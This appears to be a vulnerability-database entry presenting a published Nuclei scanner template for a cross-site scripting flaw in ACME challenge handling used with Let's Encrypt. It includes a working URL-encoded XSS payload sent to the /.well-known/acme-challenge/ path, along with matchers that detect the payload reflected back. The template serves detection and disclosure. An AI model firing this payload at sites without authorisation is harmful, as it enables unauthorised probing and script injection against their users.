漏洞描述
Let's Encrypt contains a cross-site scripting vulnerability when using the the ACME protocol to issue SSL certificates.
acme-xss: Let's Encrypt - Cross-Site Scripting
PoC代码[已公开]
id: acme-xss
info:
name: Let's Encrypt - Cross-Site Scripting
author: pdteam
severity: high
description: Let's Encrypt contains a cross-site scripting vulnerability when using the the ACME protocol to issue SSL certificates.
reference:
- https://www.mike-gualtieri.com/posts/chaining-remote-web-vulnerabilities-to-abuse-lets-encrypt
- https://community.letsencrypt.org/t/xss-via-acme-implementations/72295
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N
cvss-score: 7.2
cwe-id: CWE-79
metadata:
max-request: 1
tags: xss,acme,vuln
http:
- method: GET
path:
- '{{BaseURL}}/.well-known/acme-challenge/%3C%3fxml%20version=%221.0%22%3f%3E%3Cx:script%20xmlns:x=%22http://www.w3.org/1999/xhtml%22%3Ealert%28document.domain%26%23x29%3B%3C/x:script%3E'
matchers-condition: and
matchers:
- type: word
words:
- "<?xml version=\"1.0\"?><x:script xmlns:x=\"http://www.w3.org/1999/xhtml\">alert(document.domain)</x:script>"
- type: word
words:
- "/xml"
- "/html"
# digest: 4a0a00473045022071eb7eec456ec61a04ea7ca1ef58824c248ad7550175d12774a2d7935b69814502210098743917b592bdb223278e9fe5d72392e560d3d135b2008cb2d2dcfa39295ad5:922c64590222798bb761d5b6d8e72950